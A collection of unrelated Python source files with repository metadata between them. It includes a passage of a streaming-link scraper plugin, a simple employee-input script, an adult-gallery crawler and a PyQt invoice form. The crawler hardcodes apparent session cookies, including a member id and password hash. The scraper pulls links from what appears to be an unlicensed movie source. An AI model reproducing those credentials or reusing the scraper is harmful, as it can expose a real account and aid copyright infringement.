            result = [i for i in result if any(x in i[1] for x in years)]
            r = [(proxy.parse(i[0]), i[1]) for i in result]
            match = [i[0] for i in r if tvshowtitle == cleantitle.get(i[1]) and '(%s)' % str(year) in i[1]]
            match2 = [i[0] for i in r]
            match2 = [x for y,x in enumerate(match2) if x not in match2[:y]]
            if match2 == []: return
            for i in match2[:5]:
                try:
                    if len(match) > 0: url = match[0] ; break
                    r = proxy.request(urlparse.urljoin(self.base_link, i), 'free movies')
                    r = re.findall('(tt\d+)', r)
                    if imdb in r: url = i ; break
                except:
                    pass
            url = re.findall('(?://.+?|)(/.+)', url)[0]
            url = client.replaceHTMLCodes(url)
            url = url.encode('utf-8')
            return url
        except:
            return
    def episode(self, url, imdb, tvdb, title, premiered, season, episode):
        """Resolve one episode page URL from a show URL.

        Matches by episode title + air date first, then by date alone, then
        by season/episode numbers in the href as a last resort.
        """
        try:
            if url == None: return
            url = urlparse.urljoin(self.base_link, url)
            result = proxy.request(url, 'tv_episode_item')
            result = client.parseDOM(result, 'div', attrs = {'class': 'tv_episode_item'})
            title = cleantitle.get(title)
            premiered = re.compile('(\d{4})-(\d{2})-(\d{2})').findall(premiered)[0]
            # Convert ISO date to the site's "Month D YYYY" format.
            premiered = '%s %01d %s' % (premiered[1].replace('01','January').replace('02','February').replace('03','March').replace('04','April').replace('05','May').replace('06','June').replace('07','July').replace('08','August').replace('09','September').replace('10','October').replace('11','November').replace('12','December'), int(premiered[2]), premiered[0])
            result = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'span', attrs = {'class': 'tv_episode_name'}), client.parseDOM(i, 'span', attrs = {'class': 'tv_num_versions'})) for i in result]
            result = [(i[0], i[1][0], i[2]) for i in result if len(i[1]) > 0] + [(i[0], None, i[2]) for i in result if len(i[1]) == 0]
            result = [(i[0], i[1], i[2][0]) for i in result if len(i[2]) > 0] + [(i[0], i[1], None) for i in result if len(i[2]) == 0]
            result = [(i[0][0], i[1], i[2]) for i in result if len(i[0]) > 0]
            url = [i for i in result if title == cleantitle.get(i[1]) and premiered == i[2]][:1]
            if len(url) == 0: url = [i for i in result if premiered == i[2]]
            if len(url) == 0 or len(url) > 1: url = [i for i in result if 'season-%01d-episode-%01d' % (int(season), int(episode)) in i[0]]
            url = url[0][0]
            url = proxy.parse(url)
            url = re.findall('(?://.+?|)(/.+)', url)[0]
            url = client.replaceHTMLCodes(url)
            url = url.encode('utf-8')
            return url
        except:
            return
    def sources(self, url, hostDict, hostprDict):
        """Scrape the host links for a title; each link is base64-packed in a
        'gtfo' query parameter.  Returns a list of source dicts."""
        try:
            sources = []
            if url == None: return sources
            url = urlparse.urljoin(self.base_link, url)
            result = proxy.request(url, 'link_ite')
            links = client.parseDOM(result, 'table', attrs = {'class': 'link_ite.+?'})
            for i in links:
                try:
                    url = client.parseDOM(i, 'a', ret='href')
                    url = [x for x in url if 'gtfo' in x][-1]
                    url = proxy.parse(url)
                    url = urlparse.parse_qs(urlparse.urlparse(url).query)['gtfo'][0]
                    url = base64.b64decode(url)
                    url = client.replaceHTMLCodes(url)
                    url = url.encode('utf-8')
                    host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
                    if not host in hostDict: raise Exception()
                    host = host.encode('utf-8')
                    quality = client.parseDOM(i, 'div', attrs = {'class': 'quality'})
                    if any(x in ['[CAM]', '[TS]'] for x in quality): quality = 'CAM'
                    else: quality = 'SD'
                    quality = quality.encode('utf-8')
                    sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'direct': False, 'debridonly': False})
                except:
                    pass
            return sources
        except:
            return sources
    def resolve(self, url):
        """URLs are already final; no extra resolving needed."""
        return url
| [
"[email protected]"
] | |
0653972e0dd62e235f1b6c73af6da5b96e246c6f | 1a812d520fa0788864cab3c6bbd4e2ba0e8872c2 | /employeedataandprintthatdata.py | d97719e66d1ee36ecddc97ae0f16f35d728b4462 | [] | no_license | manutdmohit/pythonprogramexamples | b6f6906a6169ad2ecd9b16d95495474d570b065e | 06ac4af8ce13872bbe843175a61d7ad77e0f92b6 | refs/heads/main | 2023-01-14T13:14:57.468947 | 2020-11-25T05:39:01 | 2020-11-25T05:39:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | eno=int(input('Enter employee number:'))
# Collect the remaining employee details interactively (eno is read above),
# then echo everything back for confirmation.
ename = input('Enter employee name:')
esal = float(input('Enter employee salary:'))
eaddr = input('Enter employee address:')
# Bug fix: bool(input(...)) is True for ANY non-empty answer -- including the
# literal text "False" -- so the prompt's [True/False] choice was ignored.
# Parse the answer explicitly instead.
married = input('Employee married?[True/False]:').strip().lower() in ('true', 'yes', 'y', '1')
print('Please confirm your provided information')
print('Employee Number:', eno)
print('Employee Name:', ename)
print('Employee Salary:', esal)
print('Employee Address:', eaddr)
print('Employee Married?:', married)
| [
"[email protected]"
] | |
ad005e7c3c65d9d484b6e2414b855dd7605fbebe | 28ae5b967328670448b47baa87c5506d573595ac | /ex.py | 5c0db097d191b60fa670863c3721a47bfd4236a4 | [
"Apache-2.0"
] | permissive | Kagurazaka-Hanasaka/RanmaruWorks_Git | f4ea9ae838136f5969f5be1fa39d4eaa0ae1c47d | 8e327b31b1b71cb231755fe61ffee49fa2d69e69 | refs/heads/master | 2020-03-25T03:43:21.121098 | 2018-08-03T00:05:59 | 2018-08-03T00:05:59 | 143,356,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,406 | py | import requests, re, json, uuid, glob, sqlite3, time, gc, os, psutil
from bs4 import BeautifulSoup
eoltoken = "null"
merge = []
hlistc = 0
for pgn in range(5):
cookd = {
"igneous": "89540adbd",
"ipb_member_id": "2237746",
"ipb_pass_hash": "d99e752060d5e11636d7e427f62a3622",
"lv": "1533216215-1533216236"
}
excook = requests.utils.cookiejar_from_dict(cookd, cookiejar=None, overwrite=True)
exhead = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7",
"Connection": "keep-alive",
"Host": "exhentai.org",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
}
eol = []
hlist = []
exurl = "https://exhentai.org/?page="+ str(pgn)+ "&f_doujinshi=on&advsearch=1&f_search=language%3Achinese&f_srdd=5&f_sname=on&f_stags=on&f_sr=on&f_sh=on&f_apply=Apply+Filter"
orig = requests.get(exurl, headers=exhead, cookies=excook).text
if "No hits found" in orig:
print("-----Crawling Queue Ends-----")
break
else:
BSorig = BeautifulSoup(orig)
table = BSorig.find("table", {"class": "itg"})
for link in table.findAll("a", href=re.compile("https://exhentai\.org/g/[0-9]{1,8}/[A-Za-z0-9]{10}/")):
if "href" in link.attrs:
link2 = link.attrs["href"]
hlist.append(link2.split("/")[4:6])
if eoltoken in hlist:
eol = hlist.index(eoltoken)
hlist = hlist[eol+1:len(hlist)]
eoltoken = hlist[-1]
req = {
"method": "gdata",
"gidlist": hlist,
"namespace": 1
}
recl = json.loads(json.dumps(requests.post("https://api.e-hentai.org/api.php", data=json.dumps(req, ensure_ascii=False).encode("utf-8")).json(), ensure_ascii=False))['gmetadata']
for obj in recl:
with open(str(uuid.uuid4())+".json", "w", encoding="UTF-8") as f:
json.dump(obj, f, ensure_ascii=False)
hlistc = hlistc + 1
if hlistc >4:
time.sleep(5)
hlistc = 0
print("-----Page "+str(pgn)+" Crawling Ends-----")
print(psutil.virtual_memory())
# Free the crawl-loop temporaries before the merge phase to keep memory down.
del pgn, exurl, orig, BSorig, table, link, link2, eol, hlist, req, recl, obj, cookd, excook, exhead
gc.collect()
# Merge every per-gallery JSON file written above into one list.
for f in glob.glob("*.json"):
    with open(f, "rb") as inf:
        merge.append(json.load(inf))
del f
gc.collect()
# Write the combined metadata; sort_keys gives a deterministic layout.
with open("fin.json", "w", encoding="UTF-8") as out:
    json.dump(merge, out, ensure_ascii=False, sort_keys=True)
| [
"[email protected]"
] | |
4fedb92719068acc90ab3c0697b69d31c3078c67 | 3e60b7d48d101d6a8057d4b8c5f10cb3d494a98a | /addinvoice.py | c7bc679fb992f372eae9311cb2434def4121d162 | [] | no_license | suraj-adewale/SmartAccount | 15ebdd08954ead735e91b87c4702f4597674181e | cc7c0ca04b9a7a2da0cd0c6f8106041dc90e7ad3 | refs/heads/main | 2023-06-10T05:33:44.878772 | 2021-07-01T22:33:59 | 2021-07-01T22:33:59 | 378,435,258 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,419 | py | from PyQt5.QtWidgets import QMainWindow,QHBoxLayout,QAction,QTabWidget,QCompleter,QTableWidgetItem,QCalendarWidget,QTableWidget,QAbstractItemView, QApplication,QDialog, QPushButton,QLabel,QMessageBox,\
QWidget,QVBoxLayout,QGridLayout,QComboBox,QLineEdit,QScrollArea,QDateEdit,QButtonGroup,QFormLayout,QTextEdit,QSpinBox
from PyQt5 import QtCore, QtNetwork,QtWidgets
from PyQt5.QtGui import QIcon,QPixmap,QPainter
from PyQt5.QtCore import Qt, QDate,QDateTime,pyqtSignal
from customers import Customers
from addcustomer import AddCustomer
import sys, json,base64
from babel.numbers import format_currency,parse_decimal#,parse_number
from functools import partial
class ImageWidget(QWidget):
def __init__(self, imagePath, parent):
super(ImageWidget, self).__init__(parent)
self.picture = QPixmap(imagePath)
def paintEvent(self, event):
painter = QPainter(self)
painter.drawPixmap(0, 0, self.picture)
class ClickableLineEdit(QLineEdit):
clicked=pyqtSignal()
def mousePressEvent(self,event):
if event.button()==Qt.LeftButton: self.clicked.emit()
class Invoice(QMainWindow):
    def __init__(self,dic, parent=None):
        """Build the invoice window.

        dic: existing invoice data to edit ({} for a new invoice); it is kept
        in self.edit_data and consumed by InvoiceContent().
        """
        super(Invoice, self).__init__(parent)
        self.title = 'Invoice'
        self.left = (self.x()+230)
        # NOTE(review): top is derived from x() -- presumably y()+50 was
        # intended; confirm before changing.
        self.top = (self.x()+50)
        self.width = 900
        self.height = 550
        self.edit_data=dic
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        # Server address depends on the installation type stored on disk.
        # NOTE(review): these open() handles are never closed.
        usertype=json.load(open("db/usertype.json", "r"))
        if usertype=='Administrator':
            self.ip='localhost'
        if usertype=='User':
            self.ip=json.load(open("db/ipaddress.json", "r"))
        #self.setStyleSheet(open("qss/mainstyle.qss", "r").read())
        self.InvoiceContent()
        self.setCentralWidget(self.widget)
        self.show()
    def window_close(self):
        """Close this invoice window (thin wrapper usable as a slot)."""
        self.close()
def InvoiceContent(self):
self.widget=QWidget()
self.widgetDic={}
self.balance=self.comborow=0
self.row=10
#self.row_col='00'
self.rowCounts=self.row
self.amt_placeholder=format_currency(0,'NGN', locale='en_US')
self.requireddata=json.load(open("db/addinvoice.json", "r"))
self.MessageBox=QMessageBox()
mainlayout=QVBoxLayout()
self.widget.setLayout(mainlayout)
billinglayout=QHBoxLayout()
mainlayout.addLayout(billinglayout,2)
billingtab=QTabWidget()
invoicetab=QTabWidget()
billinglayout.addWidget(billingtab,3)
billinglayout.addWidget(invoicetab,2)
self.billing = QWidget()
billingform=QFormLayout()
billingform.setHorizontalSpacing(50)
self.billing.setLayout(billingform)
self.billing.setStatusTip("Enter supplier information")
self.invoice = QWidget()
invoiceform=QFormLayout()
invoiceform.setHorizontalSpacing(50)
self.invoice.setLayout(invoiceform)
self.invoice.setStatusTip("Enter supplier information")
billingtab.addTab(self.billing,"Billing")
invoicetab.addTab(self.invoice,"Invoice")
customerlayout=QGridLayout()
self.customer=QComboBox()
self.customer.setEditable(True)
self.customerbtn=QPushButton("")
self.customeredit=QPushButton("")
customerlayout.addWidget(self.customer,0,0,0,4)
customerlayout.addWidget(self.customerbtn,0,4)
customerlayout.addWidget(self.customeredit,0,5)
self.customerbtn.setIcon(QIcon('image/icon/team.png'))
self.customerbtn.setIconSize(QtCore.QSize(20,20))
self.customeredit.setIcon(QIcon('image/icon/boy.png'))
self.customeredit.setIconSize(QtCore.QSize(15,15))
self.customerbtn.clicked.connect(self.CustomerWindow)
self.customeredit.clicked.connect(self.CustomerEdit)
self.address=QTextEdit()
self.address.setMaximumHeight(50)
self.po_no=QLineEdit()
self.customertax=QComboBox()
self.customertax.addItems(['Default','Exempt'])
createfromlayout=QGridLayout()
self.createfrom=QComboBox()
self.createfrombtn=QPushButton("")
createfromlayout.addWidget(self.createfrom,0,0,0,4)
createfromlayout.addWidget(self.createfrombtn,0,4)
self.date()
termlayout= QGridLayout()
self.term=QComboBox()
self.term.addItems(["Pay in days","COD"])
self.spinbox = QSpinBox()
self.spinbox.setValue(30)
termlayout.addWidget(self.term,0,0)
termlayout.addWidget(self.spinbox,0,1)
self.salesperson=QComboBox()
self.salesperson.setEditable(True)
self.invoice_no=QLineEdit()
self.invoice_no.setReadOnly(True)
self.createfrom.addItems(["[ New Invoice]","Existing Invoice"])
self.invoice_number=self.requireddata['invoiceno']
self.invoice_no=QLineEdit(self.invoice_number)
self.salesaccount=QComboBox()
self.salesaccount.setEditable(True)
self.receivableaccount=QComboBox()
self.receivableaccount.setEditable(True)
self.customerdata=self.requireddata['customerdata']
self.customer.addItem("")
self.customer.currentTextChanged.connect(self.CustomerChange)
row=0
for key in sorted(self.customerdata):
self.customer.insertItem(row,self.customerdata[key][0])
row=row+1
self.revenueaccounts=self.requireddata['revenueaccounts']
self.salesaccount.addItem("")
self.salesaccount.insertItem(0,'-- Create a new account --')
row=1
completerlist=[]
for key in self.revenueaccounts:
self.salesaccount.insertItem(row,self.revenueaccounts[key][2])
row=row+1
completerlist.append(self.revenueaccounts[key][2])
completer = QCompleter(completerlist)
self.salesaccount.setCompleter(completer)
self.receivables=self.requireddata['receivableaccounts']
self.receivableaccount.addItem("")
self.receivableaccount.insertItem(0,'-- Create a new account --')
row=1
completerlist=[]
for key in self.receivables:
self.receivableaccount.insertItem(row,self.receivables[key][2])
row=row+1
completerlist.append(self.receivables[key][2])
completer = QCompleter(completerlist)
self.receivableaccount.setCompleter(completer)
billingform.addRow("Customer:",customerlayout)
billingform.addRow("Billing to:",self.address)
billingform.addRow("Customer PO No:",self.po_no)
billingform.addRow("Customer Tax:",self.customertax)
invoiceform.addRow("Create from:",createfromlayout)
invoiceform.addRow("Date:",self.dateedit1)
invoiceform.addRow("Terms:",termlayout)
invoiceform.addRow("Salesperson:",self.salesperson)
invoiceform.addRow("Invoice No:",self.invoice_no)
invoiceform.addRow("Revenue Account:",self.salesaccount)
invoiceform.addRow("Receivables Account:",self.receivableaccount)
self.addJournalTable()
textlayout=QGridLayout()
buttonlayout=QGridLayout()
mainlayout.addLayout(self.tablelayout,5)
mainlayout.addLayout(textlayout,2)
mainlayout.addLayout(buttonlayout,1)
self.comment=QTextEdit()
self.comment.setPlaceholderText('[Enter invoice note]')
self.nocomment=QTextEdit('Please contact us for more information about payment options.')
self.privatecomment=QTextEdit()
self.privatecomment.setPlaceholderText('[Enter internal notes]')
self.footnote=QTextEdit('Thank you for your business.')
commentgtab=QTabWidget()
commentgtab.addTab(self.comment,"Comments")
commentgtab.addTab(self.privatecomment,"Private comments")
commentgtab.addTab(self.nocomment,"No comment")
commentgtab.addTab(self.footnote,"Foot Comments")
totalform=QFormLayout()
totalform.setVerticalSpacing(5)
self.subtotal=QLabel(self.amt_placeholder)
self.tax=QLabel(self.amt_placeholder)
self.total=QLabel()
self.total.setText('<b>'+self.amt_placeholder+'</b>')
totalform.addRow('Subtotal:',self.subtotal)
totalform.addRow('Tax:',self.tax)
totalform.addRow('<b>Total</b>',self.total)
textlayout.addWidget(commentgtab,0,0,1,2)
textlayout.addWidget(QLabel(''),0,2)
textlayout.addLayout(totalform,0,3)
self.record=QPushButton('Record')
self.cancel=QPushButton('Cancel')
self.help=QPushButton('Help')
self.record.clicked.connect(self.Save_record)
self.cancel.clicked.connect(self.close)
buttonlayout.addWidget(QLabel(),0,0,1,3)
buttonlayout.addWidget(self.record,0,4)
buttonlayout.addWidget(self.cancel,0,5)
buttonlayout.addWidget(self.help,0,6)
if self.edit_data !={}:
edit_data=self.edit_data['0']
date=edit_data['0'][10]
year=(date.split('-'))[0]
month=(date.split('-'))[1]
day=(date.split('-'))[2]
self.dateedit1.setDate(QDate(int(year),int(month),int(day)))
self.customer.setCurrentText(edit_data['0'][6])
self.address.setText(edit_data['0'][7])
self.invoice_no.setText(edit_data['0'][9])
self.salesperson.setCurrentText(edit_data['0'][11])
self.receivableaccount.setCurrentText(edit_data['0'][1])
self.salesaccount.setCurrentText(edit_data['0'][4])
edit_data=self.edit_data['1']
self.UpdateRows(edit_data)
self.comborow=len(edit_data)
self.unitprice_changed_function(self.comborow-1)
self.comborow=len(self.edit_data)
if self.comborow>10:
self.rowCounts=(self.comborow+5)
self.table.setRowCount(self.rowCounts)
self.table.resizeRowsToContents()
    def CustomerWindow(self):
        """Open the customer-list picker dialog (slot for customerbtn)."""
        self.customerlist=Customers(self)
        self.customerlist.show()
def CustomerEdit(self):
self.customeredit=AddCustomer({})
self.customeredit.show()
def CustomerChange(self,obj):
try:
index=str(self.customer.currentIndex())
address=(self.customerdata.get(index))[7]
except Exception as e:
address=''
self.address.setText(address)
    def date(self):
        """Create self.dateedit1, a calendar-popup date editor preset to today."""
        date = QDate()
        currentdate=date.currentDate()
        self.dateedit1 = QDateEdit()
        # NOTE(review): this names the *window* "dateedit"; it was probably
        # meant to be self.dateedit1.setObjectName("dateedit") -- confirm
        # against any stylesheet selectors before changing.
        self.setObjectName("dateedit")
        self.dateedit1.setDate(currentdate)
        self.dateedit1.setDisplayFormat('dd/MM/yyyy')
        self.dateedit1.setCalendarPopup(True)
    def addJournalTable(self):
        """Create self.table, the invoice line-item grid, inside self.tablelayout.

        Clicking a row triggers AddJournals(); the last column is the
        per-row delete control.
        """
        JournalHeader=[" Qty "," Item "," Description "," Unit Price "," Tax "," Total ",""]
        self.tablelayout=QVBoxLayout()
        self.table =QTableWidget()
        self.table.setColumnCount(7) # seven columns (Qty..Total + delete)
        self.table.setRowCount(self.row)
        self.table.setEditTriggers(QAbstractItemView.AllEditTriggers)
        #self.table.setSizePolicy(QtWidgets.QSizePolicy.Expanding,QtWidgets.QSizePolicy.Minimum)
        self.table.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)
        header = self.table.horizontalHeader()
        header.setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)
        header.setSectionResizeMode(1, QtWidgets.QHeaderView.Stretch)
        header.setSectionResizeMode(2, QtWidgets.QHeaderView.Stretch)
        header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)
        header.setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents)
        # NOTE(review): passes a resize-mode enum divided by 2, which is not a
        # valid QHeaderView.ResizeMode value -- confirm the intended mode.
        header.setSectionResizeMode(5,1*(QtWidgets.QHeaderView.Stretch)//2)
        header.setSectionResizeMode(6, QtWidgets.QHeaderView.ResizeToContents)
        self.tablelayout.addWidget(self.table)
        self.table.clicked.connect(self.AddJournals)
        self.table.resizeRowsToContents()
        self.table.setSelectionMode(QAbstractItemView.MultiSelection)
        # Overrides AllEditTriggers set above: cells are edited via the
        # embedded widgets, not by direct item editing.
        self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)
        self.table.setShowGrid(True)
        self.table.setHorizontalHeaderLabels(JournalHeader)
        self.table.horizontalHeaderItem(0).setToolTip("Click on any row to add an account")
        self.table.horizontalHeaderItem(1).setToolTip("")
        self.table.horizontalHeaderItem(2).setToolTip("")
        self.table.horizontalHeaderItem(6).setToolTip("Click to delete a row")
def AddJournals(self, item):
    """Handle clicks on the line-item table.

    A click on column 0 appends a fresh row of editor widgets at the
    next free row (self.comborow); a click on column 6 deletes the
    clicked row.  Other columns are ignored.
    """
    currRow = (item.row())
    col = item.column()
    if col == 0:
        # One editor widget per column of the new row.
        qty = QComboBox()
        qty.setEditable(True)
        item = QComboBox()
        item.setEditable(True)
        description = QComboBox()
        description.setEditable(True)
        unitprice = QLineEdit()
        tax = QComboBox()
        tax.setEditable(True)
        total = QLabel()
        image = ImageWidget('image/icon/clear.png', self)
        unitprice.setPlaceholderText(self.amt_placeholder)
        total.setText(self.amt_placeholder)
        if self.comborow not in self.widgetDic:
            # Remember the row's widgets so totals can be recomputed later.
            widgetList = []
            widgetList.append(qty)
            widgetList.append(item)
            widgetList.append(description)
            widgetList.append(unitprice)
            widgetList.append(tax)
            widgetList.append(total)
            self.widgetDic[self.comborow] = widgetList
        # Recompute the row/grand totals whenever qty or unit price change.
        (self.widgetDic[self.comborow][3]).textChanged.connect(partial(self.unitprice_changed_function, self.comborow))
        (self.widgetDic[self.comborow][0]).currentTextChanged.connect(partial(self.unitprice_changed_function, self.comborow))
        self.table.setCellWidget(self.comborow, 0, qty)
        self.table.setCellWidget(self.comborow, 1, item)
        self.table.setCellWidget(self.comborow, 2, description)
        self.table.setCellWidget(self.comborow, 3, unitprice)
        self.table.setCellWidget(self.comborow, 4, tax)
        self.table.setCellWidget(self.comborow, 5, total)
        self.table.setCellWidget(self.comborow, 6, image)
        self.comborow = self.comborow + 1
        if self.comborow == self.rowCounts:
            # Grow the table in batches of five rows.  (The original also
            # contained a no-op expression statement `self.rowCounts+5`
            # before the assignment; removed.)
            self.rowCounts = (self.rowCounts + 5)
            self.table.setRowCount(self.rowCounts)
            self.table.resizeRowsToContents()
    if col == 6:
        self.DeleteRow(currRow)
def DeleteRow(self, row):
    """Remove one line-item row and rebuild the table from the survivors.

    Snapshots the remaining rows' values into `invoicedata` (re-indexed
    from 0), repopulates the table via UpdateRows, shrinks the table and
    refreshes the totals.
    """
    if row in self.widgetDic.keys():
        self.widgetDic.pop(row)
        invoicedata={}
        index=0
        # Snapshot each remaining row: [qty, item, description,
        # unit price, tax, total], in row order.
        for key in sorted(self.widgetDic):
            data_list=[]
            for col in range(6):
                if col==0:
                    data_list.append((self.widgetDic[key][0]).currentText())
                if col==1:
                    data_list.append((self.widgetDic[key][1]).currentText())
                if col==2:
                    data_list.append((self.widgetDic[key][2]).currentText())
                if col==3:
                    data_list.append((self.widgetDic[key][3]).text())
                if col==4:
                    data_list.append((self.widgetDic[key][4]).currentText())
                if col==5:
                    data_list.append((self.widgetDic[key][5]).text())
            invoicedata[index]=data_list
            index=index+1
        self.UpdateRows(invoicedata)
        self.comborow=self.comborow-1
        # Keep at least 10 visible rows.
        if self.rowCounts>10:
            self.rowCounts=(self.rowCounts-1)
            self.table.setRowCount(self.rowCounts)
        self.table.resizeRowsToContents()
        # Refresh subtotal/total now that a row is gone.
        self.unitprice_changed_function(row-1)
def UpdateRows(self, invoicedata):
    """Rebuild the table's editor widgets from `invoicedata`.

    `invoicedata` maps row index -> [qty, item, description, unit price,
    tax, total].  Rebuilds self.widgetDic and re-wires the change
    signals for every restored row.
    """
    self.table.clearContents()
    self.widgetDic={}
    for keys in sorted(invoicedata):
        try:
            widgetList=[]
            qty=QComboBox()
            qty.setEditable(True)
            item=QComboBox()
            item.setEditable(True)
            description=QComboBox()
            description.setEditable(True)
            unitprice=QLineEdit()
            tax=QComboBox()
            tax.setEditable(True)
            total=QLabel()
            unitprice.setPlaceholderText(self.amt_placeholder)
            # Restore the saved values for this row.
            qty.setCurrentText(invoicedata[keys][0])
            item.setCurrentText(str(invoicedata[keys][1]))
            description.setCurrentText(invoicedata[keys][2])
            unitprice.setText(invoicedata[keys][3])
            tax.setCurrentText(str(invoicedata[keys][4]))
            total.setText(invoicedata[keys][5])
            self.table.setCellWidget(int(keys),0,qty)
            self.table.setCellWidget(int(keys),1,item)
            self.table.setCellWidget(int(keys),2, description)
            self.table.setCellWidget(int(keys),3,unitprice)
            self.table.setCellWidget(int(keys),4,tax)
            self.table.setCellWidget(int(keys),5, total)
            image = ImageWidget('image/icon/clear.png', self)
            self.table.setCellWidget(int(keys), 6, image)
            widgetList.append(qty)
            widgetList.append(item)
            widgetList.append(description)
            widgetList.append(unitprice)
            widgetList.append(tax)
            widgetList.append(total)
            self.widgetDic[int(keys)]=widgetList
            # Keep totals live as the restored widgets change.
            unitprice.textChanged.connect(partial(self.unitprice_changed_function,int(keys)))
            qty.currentTextChanged.connect(partial(self.unitprice_changed_function,int(keys)))
        except Exception as e:
            print(e)
def unitprice_changed_function(self, currrow):
    """Recompute one row's total and the invoice subtotal/grand total.

    Triggered when the row's quantity or unit price changes.  Clears
    non-numeric input, writes the row total (qty * unit price), then
    re-sums every complete row.  When the row's amount cannot be
    computed, the except branch subtracts the row's previously displayed
    amount from the grand total instead.
    """
    if currrow == -1:
        return False
    # Clear non-numeric quantity input.
    try:
        float((self.widgetDic[currrow][0]).currentText())
    except Exception:
        (self.widgetDic[currrow][0]).setCurrentText('')
    # Clear non-numeric unit-price input.
    try:
        float((self.widgetDic[currrow][3]).text())
    except Exception:
        (self.widgetDic[currrow][3]).setText('')
    try:
        qty = (self.widgetDic[currrow][0]).currentText()
        unitprice = (self.widgetDic[currrow][3]).text()
        if qty == "" or unitprice == "":
            return False
        total_ = float(qty) * float(unitprice)
        (self.widgetDic[currrow][5]).setText(format_currency(total_, 'NGN', locale='en_US'))
        total = 0
        for row in self.widgetDic:
            widget = self.widgetDic[row]
            # Bug fix: the original tested widget[3] twice; the intent is
            # to skip the grand-total update while either the quantity or
            # the unit price of any row is still empty.
            if (widget[0]).currentText() == "" or (widget[3]).text() == "":
                return False
            qty = (widget[0]).currentText()
            unitprice = (widget[3]).text()
            total = total + float(qty) * float(unitprice)
        self.subtotal.setText(format_currency(total, 'NGN', locale='en_US'))
        self.total.setText('<b>' + format_currency(total, 'NGN', locale='en_US') + '</b>')
    except Exception:
        # Row became incomputable: back its previous amount out of the
        # displayed totals.  Amounts are parsed after the '₦' sign.
        # NOTE(review): float() on the split text will fail once the
        # formatted amount contains thousands separators -- confirm.
        if (self.widgetDic[currrow][5]).text() == "":
            return False
        val1 = (((self.widgetDic[currrow][5]).text()).split('₦'))[1]
        val2 = ((((self.total.text()).split('₦'))[1]).split('</b>'))[0]
        val = float(val2) - float(val1)
        (self.widgetDic[currrow][5]).clear()
        self.subtotal.setText(format_currency(val, 'NGN', locale='en_US'))
        self.total.setText('<b>' + format_currency(val, 'NGN', locale='en_US') + '</b>')
def Save_record(self):
    """Build the invoice payload from the form and POST it to /journal.

    Creates one invoice record per table row plus double-entry ledger
    rows (one credit per line against the sales account and a single
    balancing debit for the grand total against the receivable account).
    The payload is JSON, base64-encoded, and sent asynchronously;
    handleResponse reports the outcome.
    """
    # Invoice date as zero-padded YYYY-MM-DD.
    date1=self.dateedit1.date()
    year1=str(date1.year())
    day1=str(date1.day()) if len(str(date1.day()))==2 else '0'+str(date1.day())
    month1=str(date1.month()) if len(str(date1.month()))==2 else '0'+str(date1.month())
    date=(year1+'-'+month1+'-'+day1)
    # NOTE(review): the due date is read from the SAME widget as the
    # invoice date, so duedate always equals date -- a second date editor
    # was probably intended here.  Confirm.
    date2=self.dateedit1.date()
    year2=str(date2.year())
    day2=str(date2.day()) if len(str(date2.day()))==2 else '0'+str(date2.day())
    month2=str(date2.month()) if len(str(date2.month()))==2 else '0'+str(date2.month())
    duedate=(year2+'-'+month2+'-'+day2)
    # Current operator, persisted by the login screen.
    userdb=open("db/user.json", "r")
    user=json.load(userdb)
    journaltype="Sales"
    address=(self.address.toPlainText())
    customer=self.customer.currentText()
    memo="Sales;"+customer
    ref="SLS[AUTO]"
    revenueaccounts=self.salesaccount.currentText()
    receivables=self.receivableaccount.currentText()
    customerdata=self.customer.currentText()
    # Abort silently when any mandatory selection is empty.
    if revenueaccounts=="" or receivables=="" or customerdata=="":
        return False
    # Resolve the selected combo entries to their full records.
    salesaccount=self.revenueaccounts[str(self.salesaccount.currentIndex()-1)]
    receivableaccount=self.receivables[str(self.receivableaccount.currentIndex()-1)]
    customer=self.customerdata[str(self.customer.currentIndex())]
    invoiceDic={}
    total=0
    subtotal=[]
    # One invoice record per line item; the row amount is parsed back out
    # of the formatted "...₦..." total label.
    for row in self.widgetDic:
        amnt=(self.widgetDic[row][5]).text()
        amnt=amnt.split('₦')
        invoicelist=[]
        invoicelist.append(receivableaccount[2])
        invoicelist.append(customer[8])
        invoicelist.append(customer[0])
        invoicelist.append(address)
        invoicelist.append(ref)
        invoicelist.append(self.invoice_no.text())
        invoicelist.append(date)
        invoicelist.append(duedate)
        invoicelist.append(self.salesperson.currentText())
        invoicelist.append((self.widgetDic[row][0]).currentText())
        invoicelist.append((self.widgetDic[row][1]).currentText())
        invoicelist.append((self.widgetDic[row][2]).currentText())
        invoicelist.append((self.widgetDic[row][3]).text())
        invoicelist.append(str(float(parse_decimal(amnt[1],locale='en_US'))))
        invoicelist.append("Not Paid")
        invoicelist.append(user)
        invoicelist.append(salesaccount[2])
        invoiceDic[row]=invoicelist
        total=total+float(parse_decimal(amnt[1],locale='en_US'))
        subtotal.append(float(parse_decimal(amnt[1],locale='en_US')))
    # Ledger rows: one credit per line item ...
    postDic={}
    rw=0
    for sub in subtotal:
        postList=[]
        postList.append(salesaccount[2])
        postList.append(str(sub))
        postList.append('Credit')
        postList.append(ref)
        postList.append(journaltype)
        postList.append(memo)
        postList.append(date)
        postList.append(user)
        postDic[rw]=postList
        rw=rw+1
    # ... plus one balancing debit for the grand total, which also
    # carries the invoice records themselves as its last element.
    postList=[]
    postList.append(receivableaccount[2])
    postList.append(str(total))
    postList.append('Debit')
    postList.append(ref)
    postList.append(journaltype)
    postList.append(memo)
    postList.append(date)
    postList.append(user)
    postList.append(invoiceDic)
    postDic[rw]=postList
